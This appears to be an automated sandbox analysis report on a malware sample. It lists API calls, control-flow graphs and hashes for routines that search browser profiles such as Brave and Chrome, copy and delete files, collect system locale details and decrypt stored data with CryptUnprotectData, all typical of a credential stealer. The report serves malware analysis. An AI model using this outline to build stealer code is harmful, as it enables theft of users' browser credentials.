                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
                                                                                                                                                                                                                                                                                        • String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC$r
                                                                                                                                                                                                                                                                                        • API String ID: 301339242-3647752926
                                                                                                                                                                                                                                                                                        • Opcode ID: 1046dacf06819e22c0b23405e447d134bd53dcc90d3ab03f45cc3cf728388501
                                                                                                                                                                                                                                                                                        • Instruction ID: 6e622915d2f07d0ae95690ccccb175004c7357fc3a13d6b7c0930d9ccd21a1ee
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1046dacf06819e22c0b23405e447d134bd53dcc90d3ab03f45cc3cf728388501
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F7B1A571B053129FDB08DF29C94561ABBF9FB8A704F05893EE899E3750D7309A00CB91
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 918 40b610-40b6a2 call 416d40 call 416f20 call 416fb0 call 416ea0 call 416e00 * 2 call 416d40 * 2 call 4170d0 FindFirstFileA 937 40b6e1-40b6f5 StrCmpCA 918->937 938 40b6a4-40b6dc call 416e00 * 6 call 413220 918->938 939 40b6f7-40b70b StrCmpCA 937->939 940 40b70d 937->940 983 40bf8b-40bf8e 938->983 939->940 942 40b712-40b78b call 416e20 call 416f20 call 416fb0 * 2 call 416ea0 call 416e00 * 3 939->942 943 40bf30-40bf43 FindNextFileA 940->943 988 40b791-40b817 call 416fb0 * 4 call 416ea0 call 416e00 * 4 942->988 989 40b81c-40b89d call 416fb0 * 4 call 416ea0 call 416e00 * 4 942->989 943->937 945 40bf49-40bf56 FindClose call 416e00 943->945 951 40bf5b-40bf86 call 416e00 * 5 call 413220 945->951 951->983 1024 40b8a2-40b8b8 call 4170d0 StrCmpCA 988->1024 989->1024 1028 40ba79-40ba8f StrCmpCA 1024->1028 1029 40b8be-40b8d2 StrCmpCA 1024->1029 1031 40ba91-40bad1 call 401500 call 416da0 * 3 call 409b30 1028->1031 1032 40bade-40baf4 StrCmpCA 1028->1032 1029->1028 1030 40b8d8-40b9f2 call 416d40 call 415260 call 416fb0 call 416f20 call 416ea0 call 416e00 * 3 call 4170d0 * 2 CopyFileA call 416d40 call 416fb0 * 2 call 416ea0 call 416e00 * 2 call 416da0 call 4093a0 1029->1030 1185 40b9f4-40ba36 call 416da0 call 401500 call 404dc0 call 416e00 1030->1185 1186 40ba3b-40ba74 call 4170d0 DeleteFileA call 417040 call 4170d0 call 416e00 * 2 1030->1186 1094 40bad6-40bad9 1031->1094 1034 40bb66-40bb7e call 416da0 call 415490 1032->1034 1035 40baf6-40bb0d call 4170d0 StrCmpCA 1032->1035 1059 40bc51-40bc66 StrCmpCA 1034->1059 1060 40bb84-40bb8b 1034->1060 1048 40bb61 1035->1048 1049 40bb0f-40bb5b call 401500 call 416da0 * 3 call 40a030 1035->1049 1051 40beb9-40bec2 1048->1051 1049->1048 1056 
40bf20-40bf2b call 417040 * 2 1051->1056 1057 40bec4-40bf15 call 401500 call 416da0 * 2 call 416d40 call 40b610 1051->1057 1056->943 1138 40bf1a 1057->1138 1066 40be50-40be65 StrCmpCA 1059->1066 1067 40bc6c-40bdcf call 416d40 call 416fb0 call 416ea0 call 416e00 call 415260 call 416f20 call 416ea0 call 416e00 * 2 call 4170d0 * 2 CopyFileA call 401500 call 416da0 * 3 call 40a6e0 call 401500 call 416da0 * 3 call 40ace0 call 4170d0 StrCmpCA 1059->1067 1069 40bbf7-40bc41 call 401500 call 416da0 call 416d40 call 416da0 call 40a030 1060->1069 1070 40bb8d-40bb94 1060->1070 1066->1051 1077 40be67-40beae call 401500 call 416da0 * 3 call 40aa20 1066->1077 1217 40bdd1-40be1b call 401500 call 416da0 * 3 call 40b250 1067->1217 1218 40be26-40be3e call 4170d0 DeleteFileA call 417040 1067->1218 1141 40bc46 1069->1141 1071 40bbf5 1070->1071 1072 40bb96-40bbef call 401500 call 416da0 call 416d40 call 416da0 call 40a030 1070->1072 1088 40bc4c 1071->1088 1072->1071 1144 40beb3 1077->1144 1088->1051 1094->1051 1138->1056 1141->1088 1144->1051 1185->1186 1186->1028 1234 40be20 1217->1234 1225 40be43-40be4e call 416e00 1218->1225 1225->1051 1234->1218
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?,0041D71A,0041D717,00000000,?,?,?,0041DB54,0041D716), ref: 0040B695
                                                                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,0041DB58), ref: 0040B6ED
                                                                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,0041DB5C), ref: 0040B703
                                                                                                                                                                                                                                                                                        • FindNextFileA.KERNELBASE(000000FF,?), ref: 0040BF3B
                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(000000FF), ref: 0040BF4D
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                                                                                                                                                                                                                        • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                                                                                                                                                                                                                                                                        • API String ID: 3334442632-726946144
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%


                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • wsprintfA.USER32 ref: 00412589
                                                                                                                                                                                                                                                                                        • FindFirstFileA.KERNELBASE(?,?), ref: 004125A0
                                                                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,0041D864), ref: 004125CE
                                                                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,0041D868), ref: 004125E4
                                                                                                                                                                                                                                                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 004127B9
                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(000000FF), ref: 004127CE
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Find$File$CloseFirstNextwsprintf
                                                                                                                                                                                                                                                                                        • String ID: %s\%s$%s\%s$%s\*
                                                                                                                                                                                                                                                                                        • API String ID: 180737720-445461498
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%


                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • wsprintfA.USER32 ref: 00411B9D
                                                                                                                                                                                                                                                                                        • FindFirstFileA.KERNELBASE(?,?), ref: 00411BB4
                                                                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,0041D834), ref: 00411BE2
                                                                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,0041D838), ref: 00411BF8
                                                                                                                                                                                                                                                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00411D3D
                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(000000FF), ref: 00411D52
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Find$File$CloseFirstNextwsprintf
                                                                                                                                                                                                                                                                                        • String ID: %s\%s
                                                                                                                                                                                                                                                                                        • API String ID: 180737720-4073750446
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215C4,?,00401E03,?,004215C8,?,?,00000000,?,00000000), ref: 00401813
                                                                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,004215CC), ref: 00401863
                                                                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,004215D0), ref: 00401879
                                                                                                                                                                                                                                                                                        • SetThreadLocale.KERNEL32 ref: 00401AC2
                                                                                                                                                                                                                                                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401C30
                                                                                                                                                                                                                                                                                        • DeleteFileA.KERNEL32(00000000), ref: 00401CB4
                                                                                                                                                                                                                                                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00401D0A
                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(000000FF), ref: 00401D1C
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstLocaleNextThreadlstrlen
                                                                                                                                                                                                                                                                                        • String ID: \*.*
                                                                                                                                                                                                                                                                                        • API String ID: 1950708506-1173974218
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0041DC10,0041D73F), ref: 0040D22B
                                                                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,0041DC14), ref: 0040D273
                                                                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,0041DC18), ref: 0040D289
                                                                                                                                                                                                                                                                                        • FindNextFileA.KERNELBASE(000000FF,?), ref: 0040D4EE
                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(000000FF), ref: 0040D500
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3334442632-0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                                        • GetKeyboardLayoutList.USER32(00000000,00000000,0041D146), ref: 0041459E
                                                                                                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 004145B6
                                                                                                                                                                                                                                                                                        • GetKeyboardLayoutList.USER32(?,00000000), ref: 004145CA
                                                                                                                                                                                                                                                                                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0041461F
                                                                                                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 004146DF
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                                                                                                                                                                                                                                                                        • String ID: /
                                                                                                                                                                                                                                                                                        • API String ID: 3090951853-4001269591
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,0041D74E), ref: 0040DBD2
                                                                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,0041DC58), ref: 0040DC22
                                                                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,0041DC5C), ref: 0040DC38
                                                                                                                                                                                                                                                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0040E306
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                                                                                                                                                                                                                                                                        • String ID: \*.*
                                                                                                                                                                                                                                                                                        • API String ID: 433455689-1173974218
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CryptBinaryToStringA.CRYPT32(00000000,>N@,40000001,00000000,00000000), ref: 004155C0
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: BinaryCryptString
                                                                                                                                                                                                                                                                                        • String ID: >N@
                                                                                                                                                                                                                                                                                        • API String ID: 80407269-3381801619
                                                                                                                                                                                                                                                                                        • Opcode ID: 718bb6be1b75e617e987197471ae693474da6023ddc0167bf927d0320b7ad6f5
                                                                                                                                                                                                                                                                                        • Instruction ID: 37622f5e64546725dbf22d4b9568f407ee9b467eb6af981ec2fff7c5b56759cd
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 718bb6be1b75e617e987197471ae693474da6023ddc0167bf927d0320b7ad6f5
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 73110D74200A04FFDB10CFA4E844FEB37AABF89310F509549F9098B254D775E881DBA4
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00415D1E
                                                                                                                                                                                                                                                                                        • Process32First.KERNEL32(0041D599,00000128), ref: 00415D32
                                                                                                                                                                                                                                                                                        • Process32Next.KERNEL32(0041D599,00000128), ref: 00415D47
                                                                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,00000000), ref: 00415D5C
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(0041D599), ref: 00415D7A
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 420147892-0
                                                                                                                                                                                                                                                                                        • Opcode ID: f6d0f21b7cc225942ebaf2b71921687e4bacd107d031d79921886f9976f157bb
                                                                                                                                                                                                                                                                                        • Instruction ID: 4a4bbd9776da2ad99231b6c5471aa9e11f786ff18f9e7f574f496e4dc08d41d8
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f6d0f21b7cc225942ebaf2b71921687e4bacd107d031d79921886f9976f157bb
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 53012575A00608EBDB24DF94DD58BDEB7B9BF88304F108189E90597250DB749B81CF50
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,044062E0,00000000,?,0041D758,00000000,?,00000000,00000000,?,04406E58,00000000), ref: 004144C0
                                                                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 004144C7
                                                                                                                                                                                                                                                                                        • GetTimeZoneInformation.KERNEL32(?), ref: 004144DA
                                                                                                                                                                                                                                                                                        • wsprintfA.USER32 ref: 00414514
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 362916592-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 3e8ee039c0baa52381bc867147264b9e0472758f99ecf5fc77eb662dd471fe6c
                                                                                                                                                                                                                                                                                        • Instruction ID: 63b956e3650aea0bdd01ac085b80a838c67200ff8d98e36f2a49cf33a9f6a1bd
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3e8ee039c0baa52381bc867147264b9e0472758f99ecf5fc77eb662dd471fe6c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C7F06770E047289BDB309B64DD49FA9737ABB44311F0002D5EA0AE3291DB749E858F97
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409564
                                                                                                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00409583
                                                                                                                                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 004095AF
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
